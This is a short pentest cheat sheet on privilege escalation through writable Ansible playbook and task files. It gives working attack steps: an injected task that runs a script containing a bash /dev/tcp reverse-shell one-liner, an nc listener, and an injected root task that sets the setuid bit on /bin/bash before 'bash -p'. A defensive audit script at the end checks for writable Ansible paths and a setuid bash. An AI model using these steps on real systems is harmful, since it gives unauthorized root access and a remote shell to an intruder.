# Ansible Playbook Privilege Escalation

### PrivEsc with Tasks

First, check the contents of the playbooks in **`/opt/ansible/playbooks`**.\
For instance, a file named **“httpd.yaml”**.

```yaml
- name: Install and configure Apache
  ...
  roles:
    - role: geerlingguy.apache
  tasks:
    - name: configure firewall
      firewalld:
        ...
```

Next, check the contents of the configuration files in **`/opt/ansible/roles/geerlingguy.apache/tasks`**.\
Then add the exploit file to this directory.\
For example, a file named **`“shell.yml”`**.

```yaml
- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh
```

Create an exploit script for the reverse shell.

```sh
echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/root.sh
```

Then open a listener on the local machine.

```sh
nc -lvnp <local-port>
```

Finally, execute **“ansible”**.

```sh
ansible
# or
ansible-playbook  
# or
sudo -u <some-user> ansible
```


### PrivEsc with Automation Task

If the target system runs automation tasks with Ansible Playbook as root and we have write permission on the task files (**`tasks/`**), we can inject arbitrary commands into a **yaml** file.\
For example, create a new file **`/opt/ansible/tasks/evil.yaml`**.

```yaml
- hosts: localhost
  tasks:
    - name: Evil
      ansible.builtin.shell: |
        chmod +s /bin/bash
      become: true
```

After a while, we can escalate to root privileges by executing the following command.

```sh
/bin/bash -p
```
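Both sections above depend on the same weakness: task, role or playbook files that a non-root user can write while Ansible runs them as root. The following audit script is an added example, not part of the original page; the function names `audit_ansible_paths` and `has_setid` are hypothetical, and it assumes the Ansible tree is expected to be owned by a single trusted account (normally root).

```shell
#!/bin/sh
# Added audit example; function names are hypothetical, not from the page.

# audit_ansible_paths OWNER DIR...
# Print every file or directory under each DIR that is group- or
# world-writable, or not owned by OWNER (user name or numeric uid).
# Symlinks are skipped because their own mode bits are always 0777.
audit_ansible_paths() {
    owner=$1
    shift
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" ! -type l \
            \( -perm -0020 -o -perm -0002 -o ! -user "$owner" \) -print
    done
}

# has_setid FILE
# Succeed when FILE has the setuid or setgid bit, the state that
# "chmod +s /bin/bash" leaves behind.
has_setid() {
    [ -u "$1" ] || [ -g "$1" ]
}

# When called with arguments (OWNER DIR...), run the audit and also
# report a setuid/setgid /bin/bash.
if [ "$#" -gt 0 ]; then
    audit_ansible_paths "$@"
    if has_setid /bin/bash; then
        echo "/bin/bash has the setuid or setgid bit set"
    fi
fi
```

Saved under a name of your choice and invoked with `root /opt/ansible/playbooks /opt/ansible/roles /opt/ansible/tasks` as arguments, any path it prints should be tightened to root ownership with mode 0644 (files) or 0755 (directories).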


